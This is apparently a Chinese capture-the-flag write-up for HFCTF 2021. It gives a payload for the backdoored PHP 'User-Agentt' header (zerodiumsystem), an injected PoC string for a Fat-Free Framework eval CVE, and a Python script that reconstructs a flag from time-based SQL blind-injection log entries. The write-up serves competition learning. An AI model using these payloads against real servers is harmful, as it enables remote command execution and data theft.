虎符CTF2021
# 虎符CTF2021
# 0x01 签到
题目来源是一个新闻,
https://www.freebuf.com/news/267983.html
看git commit可以得知我们通过
user-agentt直接进行命令执行
所以直接user-agentt: zerodiumsystem("cat /flag"); 即可。
# unsetme
fatfree unset eval 命令拼接CVE
poc:
0%0a);echo%20`cat%20/flag`;print(%27%27
1
得到flag
# 你会日志分析吗
sql盲注反推
import re
from datetime import datetime
f = open("access.log","r")
raw = f.read()
pattern = r"192\.168\.52\.156 - - \[11\/Mar\/2021:(\d+:\d+:\d+) \+0000\] \"GET \/index\.php\?id=1'%20and%20if\(ord\(substr\(\(select%20flag%20from%20flllag\),(\d+),1\)\)=(\d+),sleep\(2\),1\)--"
matches = re.findall(pattern,raw)
l_time = datetime.strptime("18:00:57", '%H:%M:%S')
i_time = datetime.strptime("18:00:57", '%H:%M:%S')
pos = ""
ch =""
lastmatch = ""
dic = ['0']*48
for match in matches:
pos = match[1]
ch = match[2]
#print(chr(int(ch)))
l_time = i_time
i_time = datetime.strptime(match[0], '%H:%M:%S')
#print((i_time-l_time).seconds)
if (i_time-l_time).seconds>=2:
print(i_time,l_time)
print(lastmatch,match)
dic[int(lastmatch[1])]=chr(int(lastmatch[2]))
lastmatch = match
print(''.join(dic))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
编辑 (opens new window)
上次更新: 2022/05/18, 16:49:51